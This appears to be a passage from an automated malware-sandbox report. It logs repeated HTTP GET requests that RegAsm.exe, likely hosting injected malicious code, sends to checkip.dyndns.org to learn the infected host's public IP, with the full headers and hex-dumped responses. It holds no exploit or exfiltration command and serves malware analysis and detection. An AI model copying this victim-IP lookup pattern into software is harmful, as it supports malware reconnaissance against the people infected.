                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            68192.168.2.450141132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:28.670897961 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:29.359626055 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:29 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            69192.168.2.450143132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:30.117976904 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:31.809866905 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:30 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Jan 9, 2025 11:40:31.810014009 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:30 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Jan 9, 2025 11:40:31.810175896 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:30 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                            Jan 9, 2025 11:40:31.810352087 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:30 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            70192.168.2.450145132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:32.525048018 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:33.220238924 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:33 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            71192.168.2.450147132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:34.028664112 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:40:35.709753036 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:35 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            72192.168.2.450149132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:36.466109991 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:37.138622999 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:37 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            73192.168.2.450151132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:37.860517979 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:38.543601036 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:38 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            74192.168.2.450153132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:39.368392944 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:40.041055918 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:39 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            75192.168.2.450156132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:41.675342083 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:42.373166084 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:42 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            76192.168.2.450159132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:43.904495955 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:44.607522011 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:44 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            77192.168.2.450162132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:46.120498896 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:46.812278986 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:46 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            78192.168.2.450165132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:48.226061106 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:48.924968958 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:48 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            79192.168.2.450168132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:50.380938053 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:51.087171078 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:50 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            80192.168.2.450171132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:52.515243053 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:53.186758041 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:53 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            81192.168.2.450174132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:54.747343063 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:55.424125910 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:55 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            82192.168.2.450177132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:56.929925919 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:57.615180016 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:57 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            83192.168.2.450180132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:40:59.069670916 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:40:59.813823938 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:40:59 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            84192.168.2.450183132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:01.357409000 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:02.043756008 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:01 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            85192.168.2.450186132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:03.815344095 CET127OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Jan 9, 2025 11:41:04.507400036 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:04 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            86192.168.2.450188132.226.247.73807588C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Jan 9, 2025 11:41:04.603704929 CET151OUTGET / HTTP/1.1
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                            Host: checkip.dyndns.org
                                                                            Connection: Keep-Alive
                                                                            Jan 9, 2025 11:41:05.275281906 CET273INHTTP/1.1 200 OK
                                                                            Date: Thu, 09 Jan 2025 10:41:05 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 104
                                                                            Connection: keep-alive
                                                                            Cache-Control: no-cache
                                                                            Pragma: no-cache
                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


